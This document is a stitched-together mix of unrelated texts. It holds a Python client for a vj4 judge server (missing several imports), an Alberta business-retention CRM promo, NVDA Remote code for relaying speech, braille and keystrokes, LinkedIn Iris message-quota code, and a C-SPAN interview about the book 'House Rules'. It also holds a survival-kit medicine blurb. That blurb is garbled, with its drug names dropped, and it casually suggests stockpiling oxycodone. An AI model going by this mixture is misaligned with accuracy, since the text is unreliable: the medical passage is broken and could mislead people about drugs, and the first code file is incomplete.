from appdirs import user_config_dir
from os import path
from urllib.parse import urljoin

from jd4.log import logger

# Chunk size used when streaming problem data to disk.
_CHUNK_SIZE = 32768
_CONFIG_DIR = user_config_dir('jd4')
_COOKIES_FILE = path.join(_CONFIG_DIR, 'cookies')
# unsafe=True permits cookies for bare-IP hosts (common for local vj4 servers).
_COOKIE_JAR = CookieJar(unsafe=True)
try:
    _COOKIE_JAR.load(_COOKIES_FILE)
except FileNotFoundError:
    # First run: no saved session cookies yet.
    pass

class VJ4Error(Exception):
    """Error reported by the vj4 server inside a JSON response body."""

    def __init__(self, name, message, *args):
        super().__init__(name, message, *args)
        self.name = name

def _raise_error_from_dict(error):
    """Raise a VJ4Error built from the server's JSON ``error`` object.

    Centralizes the previously triplicated construction logic used by
    json_response_to_dict, problem_data and record_pretest_data.
    """
    raise VJ4Error(error.get('name', 'unknown'), error.get('message', ''),
                   *error.get('args', []))

async def json_response_to_dict(response):
    """Parse an aiohttp response as JSON and return it as a dict.

    Raises VJ4Error when the body carries a server-side error object, and a
    generic Exception when the response is not JSON at all.
    """
    if response.content_type != 'application/json':
        raise Exception('invalid content type ' + response.content_type)
    response_dict = await response.json()
    if 'error' in response_dict:
        _raise_error_from_dict(response_dict['error'])
    return response_dict

class VJ4Session(ClientSession):
    """HTTP/websocket session against a vj4 server with persistent cookies."""

    def __init__(self, server_url):
        super().__init__(cookie_jar=_COOKIE_JAR)
        self.server_url = server_url

    def full_url(self, *parts):
        """Join relative path parts onto the configured server URL."""
        return urljoin(self.server_url, path.join(*parts))

    async def get_json(self, relative_url, **kwargs):
        """GET a JSON endpoint; kwargs become query-string parameters."""
        async with self.get(self.full_url(relative_url),
                            headers={'accept': 'application/json'},
                            allow_redirects=False,
                            params=kwargs) as response:
            return await json_response_to_dict(response)

    async def post_json(self, relative_url, **kwargs):
        """POST form data to a JSON endpoint; kwargs become form fields."""
        async with self.post(self.full_url(relative_url),
                             headers={'accept': 'application/json'},
                             allow_redirects=False,
                             data=kwargs) as response:
            return await json_response_to_dict(response)

    async def judge_consume(self, handler_type):
        """Consume judge requests over a websocket until the connection drops.

        Incoming JSON messages are queued and handled sequentially by a
        single worker task, so a slow judge cannot stall websocket reads.
        """
        async with self.ws_connect(self.full_url('judge/consume-conn/websocket')) as ws:
            logger.info('Connected')
            queue = Queue()

            async def worker():
                # Handle queued requests one at a time; on any unexpected
                # error, close the websocket so the outer loop terminates.
                try:
                    while True:
                        request = await queue.get()
                        await handler_type(self, request, ws).handle()
                except CancelledError:
                    raise
                except Exception as e:
                    logger.exception(e)
                    await ws.close()

            worker_task = get_event_loop().create_task(worker())
            try:
                while True:
                    queue.put_nowait(await ws.receive_json())
            except TypeError:
                # receive_json raises TypeError once the connection closes.
                pass
            logger.warning('Connection lost with code %s', ws.close_code)
            worker_task.cancel()
            try:
                await worker_task
            except CancelledError:
                pass

    async def judge_noop(self):
        """Ping the judge endpoint; raises VJ4Error if the session is invalid."""
        await self.get_json('judge/noop')

    async def login(self, uname, password):
        """Authenticate against the server, updating the shared cookie jar."""
        logger.info('Login')
        await self.post_json('login', uname=uname, password=password)

    async def login_if_needed(self, uname, password):
        """Log in only when the current session is no longer privileged.

        On a fresh login the cookie jar is persisted so later runs can
        reuse the session.
        """
        try:
            await self.judge_noop()
            logger.info('Session is valid')
        except VJ4Error as e:
            if e.name == 'PrivilegeError':
                await self.login(uname, password)
                # NOTE(review): assumes _CONFIG_DIR already exists; CookieJar.save
                # may fail on a first run where appdirs' directory was never
                # created — TODO confirm.
                await get_event_loop().run_in_executor(
                    None, lambda: _COOKIE_JAR.save(_COOKIES_FILE))
            else:
                raise

    async def judge_datalist(self, last):
        """Fetch the list of problem data updated since ``last``."""
        return await self.get_json('judge/datalist', last=last)

    async def problem_data(self, domain_id, pid, save_path):
        """Stream the problem data archive for (domain_id, pid) into save_path."""
        logger.info('Getting problem data: %s, %s', domain_id, pid)
        loop = get_event_loop()
        async with self.get(self.full_url('d', domain_id, 'p', pid, 'data'),
                            headers={'accept': 'application/json'}) as response:
            if response.content_type == 'application/json':
                # A JSON body here is always an error report, never data.
                response_dict = await response.json()
                if 'error' in response_dict:
                    _raise_error_from_dict(response_dict['error'])
                raise Exception('unexpected response')
            if response.status != 200:
                raise Exception('http error ' + str(response.status))
            with open(save_path, 'wb') as save_file:
                while True:
                    buffer = await response.content.read(_CHUNK_SIZE)
                    if not buffer:
                        break
                    # Write via the default executor to avoid blocking the loop.
                    await loop.run_in_executor(None, save_file.write, buffer)

    async def record_pretest_data(self, rid):
        """Return the raw pretest data bytes for record ``rid``."""
        logger.info('Getting pretest data: %s', rid)
        async with self.get(self.full_url('records', rid, 'data'),
                            headers={'accept': 'application/json'}) as response:
            if response.content_type == 'application/json':
                # A JSON body here is always an error report, never data.
                response_dict = await response.json()
                if 'error' in response_dict:
                    _raise_error_from_dict(response_dict['error'])
                raise Exception('unexpected response')
            if response.status != 200:
                raise Exception('http error ' + str(response.status))
            return await response.read()
If you are thinking about signing up for our AlbertaBusinessCounts program now is the time to do it. There are a number of new modules, features and enhancements for the ExecutivePulse CRM System. Many of these will impact you—regardless of how you use the CRM System. EDA believes business retention and expansion programs are best performed as a community driven activity to maximize local development of existing industry. Each community or region develops its own approaches to conduct business outreach. A robust CRM is an integral part of this approach. The AlbertaBusinessCounts (ABC) Program gives your community a consistent method for gathering the data needed to identify and analyze business needs at the local, regional and provincial level. Within our program is a series of free webinars designed to provide you with information and training relating to our AlbertaBusinessCounts Program. EDA holds the provincial master license for Executive Pulse, a software designed to collect and analyze data on existing industries in Alberta. A special licensing agreement enables EDA to make this software available to economic development organizations at a reduced price.
import os
import wx
from . import input
import api
import nvwave
import tones
import speech
import ctypes
import braille
import inputCore

# hasUiAccess is imported from systemUtils when available, falling back to
# config — presumably to support older NVDA releases; TODO confirm the
# version where it moved.
try:
    from systemUtils import hasUiAccess
except ModuleNotFoundError:
    from config import hasUiAccess

import ui
import versionInfo

import logging
logger = logging.getLogger('local_machine')


def setSpeechCancelledToFalse():
    """
    This function updates the state of speech so that it is aware that future
    speech should not be cancelled. In the long term this is a fragile
    solution as NVDA does not support modifying the internal state of speech.
    """
    if versionInfo.version_year >= 2021:
        # workaround as beenCanceled is readonly as of NVDA#12395
        speech.speech._speechState.beenCanceled = False
    else:
        speech.beenCanceled = False


class LocalMachine:
    # Executes commands received from a remote machine on the local NVDA
    # instance: speech, braille, tones, wave files, key input and clipboard.

    def __init__(self):
        # When muted, incoming sound/speech commands are silently dropped.
        self.is_muted = False
        # When True, braille cells received remotely are written to the local display.
        self.receiving_braille=False

    def play_wave(self, fileName):
        """Instructed by remote machine to play a wave file."""
        if self.is_muted:
            return
        if os.path.exists(fileName):
            # ignore async / asynchronous from kwargs:
            # playWaveFile should play asynchronously from NVDA remote.
            nvwave.playWaveFile(fileName=fileName, asynchronous=True)

    def beep(self, hz, length, left, right, **kwargs):
        # Play a local tone with the remote's pitch, duration and panning.
        if self.is_muted:
            return
        tones.beep(hz, length, left, right)

    def cancel_speech(self, **kwargs):
        if self.is_muted:
            return
        # Marshal onto the wx main thread; the speech manager is driven there.
        wx.CallAfter(speech._manager.cancel)

    def speak(
            self,
            sequence,
            priority=speech.priorities.Spri.NORMAL,
            **kwargs
    ):
        # Speak a remote speech sequence locally at the given priority.
        if self.is_muted:
            return
        # Ensure the pending remote speech is not treated as already cancelled.
        setSpeechCancelledToFalse()
        wx.CallAfter(speech._manager.speak, sequence, priority)

    def display(self, cells, **kwargs):
        # Only display when enabled, a display is present, and the remote
        # cells fit; pad with blank cells (0) up to the local display size.
        if self.receiving_braille and braille.handler.displaySize > 0 and len(cells) <= braille.handler.displaySize:
            # We use braille.handler._writeCells since this respects thread safe displays and automatically falls back to noBraille if desired
            cells = cells + [0] * (braille.handler.displaySize - len(cells))
            wx.CallAfter(braille.handler._writeCells, cells)

    def braille_input(self, **kwargs):
        # Replay a remote braille gesture through the local input manager.
        try:
            inputCore.manager.executeGesture(input.BrailleInputGesture(**kwargs))
        except inputCore.NoInputGestureAction:
            # No local action is bound to this gesture; ignore it.
            pass

    def set_braille_display_size(self, sizes, **kwargs):
        # Choose the smallest positive display size among all machines
        # (including the local one); if none is positive, fall back to the
        # local display's cell count. A size of 0 disables braille.
        sizes.append(braille.handler.display.numCells)
        try:
            size=min(i for i in sizes if i>0)
        except ValueError:
            size = braille.handler.display.numCells
        braille.handler.displaySize = size
        braille.handler.enabled = bool(size)

    def send_key(self, vk_code=None, extended=None, pressed=None, **kwargs):
        # Inject a remote key event locally (scan code argument is unused).
        wx.CallAfter(input.send_key, vk_code, None, extended, pressed)

    def set_clipboard_text(self, text, **kwargs):
        # Replace the local clipboard contents with remote-supplied text.
        api.copyToClip(text=text)

    def send_SAS(self, **kwargs):
        """
        This function simulates as "a secure attention sequence" such as CTRL+ALT+DEL.
        SendSAS requires UI Access, so we provide a warning when this fails.
        This warning will only be read by the remote NVDA if it is currently
        connected to the machine.
        """
        if hasUiAccess():
            ctypes.windll.sas.SendSAS(0)
        else:
            # Translators: Sent when a user fails to send CTRL+ALT+DEL from a remote NVDA instance
            ui.message(_("No permission on device to trigger CTRL+ALT+DEL from remote"))
            logger.warning("UI Access is disabled on this machine so cannot trigger CTRL+ALT+DEL")
What medicines do you truly need in your survival kit? The answer depends a lot on your own situation. And how do you get the supply you need of a prescription medication when you have to fight your insurance company? If you’re planning for a longer disaster or emergency situation, it’s a must-have antibiotic. Get the cream, rather than the ointment, because it heals faster and reduces scarring. You can also use neomycin or bacitracin zinc. They’re all great for mild to moderate injuries, aches, and pain relief. Aspirin carries the additional bonus of being healthy for your heart. This is your major pain relief medication. Be aware that you must be careful and wise in your use of oxycodone. It’s a heavily restricted major narcotic (and frequently gets sold on the street). But, it’s excellent if you’re planning for intense pain relief. This is your go-to for minor allergic reactions. Sneezing, coughing, wheezing, hives, and skin rash all succumb to Benadryl. The one con is the side effect: you will feel quite sleepy and tired after you take it. Benadryl can’t handle severe allergic reactions, which require a shot. This is a prescription-strength antifungal. It protects you from athlete’s foot, jock itch, and ringworm. So, yes. Having those medications available will protect you from many diseases and conditions which can affect you if you have to rough it for a while. Keep ‘em at your disposal.
# Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.

from time import time
from gevent import spawn, sleep
from gevent.lock import Semaphore
from collections import deque
from datetime import datetime
import iris.cache
from iris import metrics
import logging
import ujson

logger = logging.getLogger(__name__)

# All quota rules joined with their application and (optional) owner target.
get_application_quotas_query = '''SELECT `application`.`name` as application,
                                         `application_quota`.`hard_quota_threshold`,
                                         `application_quota`.`soft_quota_threshold`,
                                         `application_quota`.`hard_quota_duration`,
                                         `application_quota`.`soft_quota_duration`,
                                         `target`.`name` as target_name,
                                         `target_type`.`name` as target_role,
                                         `application_quota`.`plan_name`,
                                         `application_quota`.`wait_time`
                                  FROM `application_quota`
                                  JOIN `application` ON `application`.`id` = `application_quota`.`application_id`
                                  LEFT JOIN `target` on `target`.`id` = `application_quota`.`target_id`
                                  LEFT JOIN `target_type` on `target_type`.`id` = `target`.`type_id`'''

# Upsert a quota row for an application.
insert_application_quota_query = '''INSERT INTO `application_quota` (`application_id`, `hard_quota_threshold`, `soft_quota_threshold`,
                                                                    `hard_quota_duration`, `soft_quota_duration`, `plan_name`, `target_id`, `wait_time`)
                                    VALUES (:application_id, :hard_quota_threshold, :soft_quota_threshold, :hard_quota_duration,
                                            :soft_quota_duration, :plan_name, :target_id, :wait_time)
                                    ON DUPLICATE KEY UPDATE `hard_quota_threshold` = :hard_quota_threshold,
                                                            `soft_quota_threshold` = :soft_quota_threshold,
                                                            `hard_quota_duration` = :hard_quota_duration,
                                                            `soft_quota_duration` = :soft_quota_duration,
                                                            `plan_name` = :plan_name,
                                                            `target_id` = :target_id,
                                                            `wait_time` = :wait_time'''

create_incident_query = '''INSERT INTO `incident` (`plan_id`, `created`, `context`, `current_step`, `active`, `application_id`)
                           VALUES ((SELECT `plan_id` FROM `plan_active` WHERE `name` = :plan_name),
                                   :created, :context, 0, TRUE, :sender_app_id)'''

check_incident_claimed_query = '''SELECT `active`
                                  FROM `incident`
                                  WHERE `id` = :id'''

required_quota_keys = frozenset(['hard_quota_threshold', 'soft_quota_threshold', 'hard_quota_duration',
                                 'soft_quota_duration', 'plan_name', 'wait_time', 'target_name'])

quota_int_keys = ('hard_quota_threshold', 'soft_quota_threshold', 'hard_quota_duration', 'soft_quota_duration', 'wait_time')

# Owners are emailed about a soft breach at most once per this many seconds.
soft_quota_notification_interval = 1800


class ApplicationQuota(object):
    """Tracks per-application send rates and enforces soft/hard quotas.

    Rates are counted in per-minute buckets held in fixed-length deques.
    A soft breach emails the configured owner (still allowing the send);
    a hard breach drops the message and raises an Iris incident.
    """

    def __init__(self, db, expand_targets, message_send_enqueue, sender_app):
        self.db = db
        self.expand_targets = expand_targets
        self.message_send_enqueue = message_send_enqueue

        # Iris application used as the sender of quota-breach notifications.
        self.iris_application = None
        if sender_app:
            self.iris_application = iris.cache.applications.get(sender_app)
            if self.iris_application:
                logger.info('Using iris application (%s) for sender quota notifications.', sender_app)
            else:
                logger.error('Invalid iris application (%s) used for sender. Quota breach notificiations/incidents will not work.', sender_app)
        else:
            logger.warning('Iris sender_app not configured so notifications for quota breaches will not work')

        # application: (hard_buckets, soft_buckets, hard_limit, soft_limit, wait_time, plan_name, (target_name, target_role))
        self.rates = {}

        # application: (incident_id, time())
        self.last_incidents = {}
        self.last_incidents_mutex = Semaphore()

        # application: time()
        self.last_soft_quota_notification_time = {}
        self.last_soft_quota_notification_time_mutex = Semaphore()

        metrics.add_new_metrics({'quota_hard_exceed_cnt': 0, 'quota_soft_exceed_cnt': 0})

        # Background greenlet that reloads rules and rolls buckets every minute.
        spawn(self.refresh)

    def get_new_rules(self):
        """Yield quota rule rows from the database."""
        session = self.db.Session()
        for row in session.execute(get_application_quotas_query):
            yield row
        session.close()

    def refresh(self):
        """Reload quota rules once a minute and advance the rate buckets.

        Runs forever in its own greenlet (spawned from __init__).
        """
        while True:
            logger.info('Refreshing app quotas')
            new_rates = {}

            for application, hard_limit, soft_limit, hard_duration, soft_duration, target_name, target_role, plan_name, wait_time in self.get_new_rules():
                # Durations are stored in seconds; buckets are per-minute.
                # Floor division keeps the bucket count an int (dict.viewkeys()
                # and true division were Python-2-only assumptions here).
                new_rates[application] = (hard_limit, soft_limit, hard_duration // 60, soft_duration // 60,
                                          wait_time, plan_name, (target_name, target_role))

            old_keys = set(self.rates)
            new_keys = set(new_rates)

            # Remove old application entries
            for key in old_keys - new_keys:
                logger.info('Pruning old application quota for %s', key)
                try:
                    del self.rates[key]
                    del self.last_incidents[key]
                except KeyError:
                    pass

            # Create new ones with fresh buckets
            for key in new_keys - old_keys:
                hard_limit, soft_limit, hard_duration, soft_duration, wait_time, plan_name, target = new_rates[key]
                self.rates[key] = (deque([0] * hard_duration, maxlen=hard_duration),  # hard buckets
                                   deque([0] * soft_duration, maxlen=soft_duration),  # soft buckets
                                   hard_limit, soft_limit, wait_time, plan_name, target)

            # Update existing ones + append new time interval. Keep same time bucket object if duration hasn't changed, otherwise create new
            # one and resize accordingly
            for key in new_keys & old_keys:
                hard_limit, soft_limit, hard_duration, soft_duration, wait_time, plan_name, target = new_rates[key]
                self.rates[key] = (self.rates[key][0] if len(self.rates[key][0]) == hard_duration else deque(self.rates[key][0], maxlen=hard_duration),
                                   self.rates[key][1] if len(self.rates[key][1]) == soft_duration else deque(self.rates[key][1], maxlen=soft_duration),
                                   hard_limit, soft_limit, wait_time, plan_name, target)

                # Increase minute interval for hard + soft buckets
                self.rates[key][0].append(0)
                self.rates[key][1].append(0)

            metrics.add_new_metrics({'app_%s_quota_%s_usage_pct' % (app, quota_type): 0
                                     for quota_type in ('hard', 'soft')
                                     for app in new_keys})

            logger.info('Refreshed app quotas: %s', ', '.join(new_keys))
            sleep(60)

    def allow_send(self, message):
        """Account this message against its application's quota.

        Returns False when the hard quota is breached (message must not be
        sent; an incident is raised); True otherwise. A soft breach only
        notifies the owner and still allows the send.
        """
        application = message.get('application')

        if not application:
            return True

        # Purpose of quotas is to protect downstreams. If we're already going to drop this message,
        # don't let it account against quota.
        if message.get('mode') == 'drop':
            return True

        rate = self.rates.get(application)

        if not rate:
            return True

        hard_buckets, soft_buckets, hard_limit, soft_limit, wait_time, plan_name, target = rate

        # Increment both buckets for this minute
        hard_buckets[-1] += 1
        soft_buckets[-1] += 1

        # If hard limit breached, disallow sending this message and create incident
        hard_quota_usage = sum(hard_buckets)
        hard_usage_pct = 0
        if hard_limit > 0:
            hard_usage_pct = (hard_quota_usage / hard_limit) * 100
        metrics.set('app_%s_quota_hard_usage_pct' % application, hard_usage_pct)

        if hard_quota_usage > hard_limit:
            metrics.incr('quota_hard_exceed_cnt')
            with self.last_incidents_mutex:
                self.notify_incident(application, hard_limit, len(hard_buckets), plan_name, wait_time)
            return False

        # If soft limit breached, just notify owner and still send
        soft_quota_usage = sum(soft_buckets)
        soft_usage_pct = 0
        if soft_limit > 0:
            soft_usage_pct = (soft_quota_usage / soft_limit) * 100
        metrics.set('app_%s_quota_soft_usage_pct' % application, soft_usage_pct)

        if soft_quota_usage > soft_limit:
            metrics.incr('quota_soft_exceed_cnt')
            with self.last_soft_quota_notification_time_mutex:
                self.notify_target(application, soft_limit, len(soft_buckets), *target)
            return True

        return True

    def notify_incident(self, application, limit, duration, plan_name, wait_time):
        """Create an Iris incident for a hard quota breach.

        Called with last_incidents_mutex held (see allow_send). Skips
        creation when the previous incident is still active, or when
        wait_time seconds have not elapsed since it was created.
        """
        if not self.iris_application:
            logger.warning('Application %s breached hard quota. Cannot notify owners as application is not set', application)
            return

        if not plan_name:
            logger.error('Application %s breached hard quota. Cannot create iris incident as plan is not set (may have been deleted).', application)
            return

        logger.warning('Application %s breached hard quota. Will create incident using plan %s', application, plan_name)

        session = self.db.Session()

        # Avoid creating new incident if we have an incident that's either not claimed or claimed and wait_time hasn't been exceeded
        last_incident = self.last_incidents.get(application)
        if last_incident:
            last_incident_id, last_incident_created = last_incident
            # `active` appears to mean "not yet claimed" here (see skip log
            # below) — TODO confirm against the incident schema.
            claimed = session.execute(check_incident_claimed_query, {'id': last_incident_id}).scalar()
            if claimed:
                logger.info('Skipping creating incident for application %s as existing incident %s is not claimed',
                            application, last_incident_id)
                session.close()
                return
            if wait_time and (time() - last_incident_created) < wait_time:
                logger.info('Skipping creating incident for application %s as it is not yet %s seconds since existing incident %s was claimed',
                            application, wait_time, last_incident_id)
                session.close()
                return

        # Make a new incident
        incident_data = {
            'plan_name': plan_name,
            'created': datetime.utcnow(),
            'sender_app_id': self.iris_application['id'],
            'context': ujson.dumps({
                'quota_breach': {
                    'application': application,
                    'limit': limit,
                    'duration': duration
                }
            })
        }

        incident_id = session.execute(create_incident_query, incident_data).lastrowid
        session.commit()
        session.close()

        self.last_incidents[application] = incident_id, time()
        logger.info('Created incident %s', incident_id)

    def notify_target(self, application, limit, duration, target_name, target_role):
        """Email the quota owner about a soft breach, rate-limited.

        Called with last_soft_quota_notification_time_mutex held (see
        allow_send). At most one notification is sent per application per
        soft_quota_notification_interval seconds.
        """
        if not self.iris_application:
            logger.warning('Application %s breached soft quota. Cannot notify owners as application is not set', application)
            return

        if not target_name or not target_role:
            logger.error('Application %s breached soft quota. Cannot notify owner as they aren\'t set (may have been deleted).', application)
            return

        last_notification_time = self.last_soft_quota_notification_time.get(application)
        now = time()

        if last_notification_time is not None and (now - last_notification_time) < soft_quota_notification_interval:
            logger.warning('Application %s breached soft quota. Will NOT notify %s:%s as they will only get a notification once every %s seconds.',
                           application, target_role, target_name, soft_quota_notification_interval)
            return

        self.last_soft_quota_notification_time[application] = now

        logger.warning('Application %s breached soft quota. Will notify %s:%s', application, target_role, target_name)

        targets = self.expand_targets(target_role, target_name)

        if not targets:
            logger.error('Failed resolving %s:%s to notify soft quota breach.', target_role, target_name)
            return

        mode_id = iris.cache.modes.get('email')
        if not mode_id:
            logger.error('Failed resolving email mode to notify soft quota breach for application %s', application)
            return

        for username in targets:
            message = {
                'application': self.iris_application['name'],
                'mode_id': mode_id,
                'mode': 'email',
                'target': username,
                'subject': 'Application %s exceeding message quota' % application,
                'body': ('Hi %s\n\nYour application %s is currently exceeding its soft quota of %s messages per %s minutes.\n\n'
                         'If this continues, your messages will eventually be dropped on the floor and an Iris incident will be raised.\n\n'
                         'Regards,\nIris') % (username, application, limit, duration, )
            }
            self.message_send_enqueue(message)
Mr. Cwiklik talked about his book House Rules: A Freshman Congressman's Initiation to the Backslapping, Backpedaling and Backstabbing Ways of Washington, published by Villard. He is a freelance writer and former editor for the Ottaway News Service who followed Nebraska Democrat Peter Hoagland through his campaign, election and first year in office. In the book, Mr. Cwiklik discussed some of the issues debated by the first session of the 102nd Congress, including the savings and loan bailout and the Congressional pay raise, and provided an inside look at the political process and the Washington establishment. He discussed how he got involved with the project and to what extent the experience helped shape his view of Congress. BRIAN LAMB, HOST: Robert Cwiklik, you have a new book out called "House Rules." What's it all about? ROBERT CWIKLIK, AUTHOR, "HOUSE RULES": Well, it's about the first year in office of a freshman congressman. And his name is Peter Hoagland. He's a Democrat from Omaha, Nebraska. LAMB: Why did you choose Mr. Hoagland? CWIKLIK: Well, really, any freshman congressman would have served our purposes, but the publishers wanted to go with a Democrat, since they're supposedly running the show here. And Congressman Hoagland won his race with, I think, a 3,000-vote victory margin. So we thought that would lend a little drama to the narrative. LAMB: Who are the publishers? CWIKLIK: Villard Books, which is a Random House subsidiary. LAMB: And did they come to you with this idea? CWIKLIK: Yeah. I was contacted by my agent. And she said, "Well, you know, they're looking for a Washington writer. You're a Washington writer, aren't you?" And so it was billed to me as a look at the human side of life on the Hill, and the idea was that a freshman congressman is still closer to an ordinary mortal than most people up here. 
So that to get in and perch on his shoulder might give people an idea of what it's like to become a member of the Washington establishment; how does that happen. LAMB: Peter Hoagland of Nebraska was first elected what year? CWIKLIK: I met him in March of '89 -- oh, wait a minute, I'm sorry -- in February of '89. And I began to, I guess, shadow him in early March and stayed fairly close intermittently. There were periods when I would hang around the office quite often and then periods when I would draw back when things up here calmed down a bit. LAMB: What were you doing for a living before you started following Mr. Hoagland around? CWIKLIK: Well, I was free-lance writing. I wrote several children's books. And, you know, the odd article here and there. But never written much about politics before. And that was also -- the idea was to get someone to write this who was fairly new at writing about politics. LAMB: Let me ask you a technical question. When I read the book, I kept looking for a picture somewhere of Peter Hoagland. And there is none in the book. What's the reason for that? CWIKLIK: Actually, I had several pictures that I wanted to put in the book, and I wanted -- there was one that I wanted to use on the cover. But if you know anything about publishing, the author's advice is the last thing that they want when they're facing those kind of, you know, vital questions. So they decided that they wanted this sort of Capitol Hill power kind of look, you know, with the dome floating in the background there. LAMB: So there was never any thought of having the picture from the publisher's standpoint. CWIKLIK: As far as -- well, they told me that they were giving it some thought, but I think that was just to make me feel better. LAMB: All right. Describe Peter Hoagland then. CWIKLIK: Well, he's a very soft-spoken, conscientious guy. I think he tends to take a kind of an intellectual approach to politics. 
I think that was one of -- among his main attractions to his public life was a real strong interest in issues and in working out plausible solutions to immense problems, appeals to his type of guy. CWIKLIK: He was born in Omaha to a fairly prominent local family. There was -- the Hoagland Lumber Company was one of the bigger presences in the local business community. And on his mother's side, there was the Carpenter Paper Company. So these are two well-established institutions that he was born amidst. CWIKLIK: His family was very solidly Republican. LAMB: Was he ever a Republican? CWIKLIK: He was most of his early life. Actually, it came as a bit of a shock when he changed. It was a bit of a shock to his family. He was back home after having gone to law school and he lived in Washington as a public defender for a few years. And then he married and went back home and was working on the sly on the campaign for a Democrat, a local Democrat. I forget what kind of office it was. And his mother approached him one day and said that she'd heard a rumor that he was a Democrat. And the way his wife recalled the story to me, it sounded as if his mother said "Democrat" like someone might say "drug addict." They were none too pleased about that. CWIKLIK: He went to Stanford undergraduate and Yale Law School. LAMB: Was he a top student? CWIKLIK: I think he was a good student. I don't remember specifically any honors or anything like that. But I wouldn't be surprised. LAMB: At some point -- I don't know whether I wrote it down or not -- in the book you talked about the number of members of the House who had been to Harvard -- graduated, also to Yale. And then I think you said five of those had gone to both schools. Was it, like, 50-some to Harvard and 20-some to Yale? CWIKLIK: Yeah. I wrote away to all the schools I mention there and got -- they have -- they are very proud of their prestigious alumni. And, yeah, there are quite a few that come from Ivy League schools. 
But anybody that's hanging around Capitol Hill knows that that's not only in Congress, but in the bureaucracies, there's just a whole lot of people from Ivy League schools. LAMB: So it really doesn't matter to you or to the publisher that it was Peter Hoagland. It could have been Tom Smith. CWIKLIK: Well, in fact, my first choice was a Republican, whose name I guess it wouldn't be fair to mention. It would be sort of blind-siding him. And they said that yeah, that would be kind of nice, but, you know, it was kind of like the picture on the cover idea. They have their own set idea of what this book would be, and they thought a majority party person would be much more revealing. LAMB: Do you have any more on how they actually selected Peter Hoagland? CWIKLIK: Well, I made the actual selection, and there was nothing very scientific about it. I'm sure you're familiar with -- the Congressional Quarterly does this roundup of the elections and they print these mug shots all across the page of all the new members. And I took a look at all those and I read what limited information there was there, and said, "Well, I think this guy looks pretty good." LAMB: How much access did you have to him? CWIKLIK: Well, I had quite a bit of access to the office. I mean, I could basically come in when I wanted to. I wasn't admitted to all meetings, but enough to get a good idea of how things worked. And it's hard to have much access to things like caucuses and there's a lot of members-only stuff going on on the Hill. So to get an idea of what happened in there, I would just have to depend on him to recreate certain scenes for me. And you know how -- these guys are very busy, so there was often just no time to do that. I mean, we'd be running down the hall together. I'm saying, "So, you know, what did it feel like in there? What did this guy say to you?" And he's got eight different agendas going at once. So that was a challenge for a while. 
LAMB: What was the first thing you noticed about a congressman -- a freshman congressman -- that got your attention? You say you hadn't covered much of Congress. CWIKLIK: Well, I was kind of amazed that anyone would want this job, for one thing. I mean, it's just really drudgery. Maybe it was the particular year that he came in, with the S&L bailout landing on his desk with a thud as soon as he got here. I mean, there's just piles and piles of this deadening regulatory jargon that you've got to wade through and try to make some sense out of it and you had to mark up in two weeks, and you've got to be able to vote with, you know, some degree of intelligence on these ridiculously huge issues. There was a lot of pressure early on. Besides that, you know, he's got a big debt from his campaign, so he's got to raise a lot of money. And he's got a campaign coming up, and he's sure somebody's going to challenge him if he only won by 3,000 votes, so there's a pressure every weekend to fly back home and to meet with, you know, all kinds of different groups and just speak and to, you know, just shuttle everywhere and do everything at once. So it just doesn't look like a hell of a lot of fun to me. LAMB: Has he told you what he thinks of this book? CWIKLIK: Yeah. He's not crazy about it. CWIKLIK: Well, he says that it's cynical, and he says that it's unfair. But I tend to think -- I mean, I've had various readings on that. I've just read a review in the Washington Monthly where the gentleman writing it says exactly the opposite. He says the narrative exhibits remarkable fair-mindedness. So there's two opposite poles. I mean, I think it's fair. And I try to present both sides on any given issue. But I think that the career of a freshman congressman is such that it's bound to look a little fishy if you look too closely. LAMB: He's in his second term now. LAMB: How big did he win the first term? CWIKLIK: He won his first election by 3,000 votes. 
CWIKLIK: And the second term he won 58 percent of the vote. He was -- it was a landslide. LAMB: The district, though, has been traditionally over the years Republican? CWIKLIK: Yes. Well, it's funny because there's a Democratic majority, but Republicans consistently have won there. He was the first Democrat to win in quite some time. LAMB: After you wrote the book -- by the way, what was the publication date on it? CWIKLIK: It just came out yesterday, I think. LAMB: And when you had the first copy, did you go to him and say, "Mr. Congressman, here's a copy of the book on you"? CWIKLIK: Well, no. We had an agreement that I would give him a manuscript before publication so that he could review it and tell me if he thought I made any errors in time for me to make changes that I felt were appropriate. And so that's what we did. We sent him a manuscript, and he sent us back a few comments. LAMB: Were there corrections that he tried to make that you went along with? CWIKLIK: There were some, yeah. And there were many that I didn't. LAMB: What kind of things did he want you to change that you didn't? CWIKLIK: That I didn't? Well, for example, at one point in the book in a kind of breezy section about his biography, I was talking about what he had done in college and how he got started in politics. I, in passing, mentioned that he served in the military -- I forget the years. I think it was '62 and '63. And then I said "wartime," as he later put it in a campaign brochure. But he served stateside; he was never in the Army, and it looked a little bit like he was trying to make it appear as if he was in combat. And there was a picture on the brochure with him in battle fatigues next to a couple of other guys and they had, like, a tank behind them or something. And so he asked me to take that out. He said that brochure didn't exist. And, you know, I had the brochure. So I had to disagree with him on that, on the question of its existence. 
LAMB: Is Congressman Peter Hoagland, in your opinion, an honest man? CWIKLIK: I think so, though I've had my doubts lately about his relationship to the facts. But I think he's feeling some pressure. Congressmen get nervous when a negative ad is aired or when even a slightly negative story in the press appears. So I can imagine an entire book would be the subject of, you know, just paroxysms. LAMB: Was this book written about in Omaha? CWIKLIK: Yeah, there was an article about it just before Christmas. And it was basically a "he said, then I said," you know, not very much. LAMB: ... and to what's said in the Omaha daily newspaper. CWIKLIK: And I think that's typical, especially in an office where there's a real dogfight expected in the next election. They want to keep the finger on the pulse. They actually had the newspaper faxed to the office twice a day, good chunks of it -- the morning edition and the evening edition. LAMB: You pointed out in your book that that was expensive? CWIKLIK: Well, I'm sort of speculating on that. It seems like an expensive way to read the paper, to get it faxed over the phone line. But then again, you know, you've got to wait, I guess, about a week to get it, so if you really need it. LAMB: But you said Congressman Hoagland was rather frugal. CWIKLIK: I did, didn't I? I guess there was an inconsistency there. LAMB: ...and wrap it up and keep it. CWIKLIK: ...personally was. I mean, that sort of ran through his whole method of operation. He himself was personally very frugal, and he personally didn't really enjoy self-aggrandizement. He didn't like people calling him "Congressman," and he didn't like wearing -- you know those lapel pins that members are walking around with that identify them? He didn't like wearing that. He thought that was sort of bragging. LAMB: How long were you around him? CWIKLIK: It was several months. From March pretty much till the end of the year. And I stopped back now and then in '90 to tie up loose ends. 
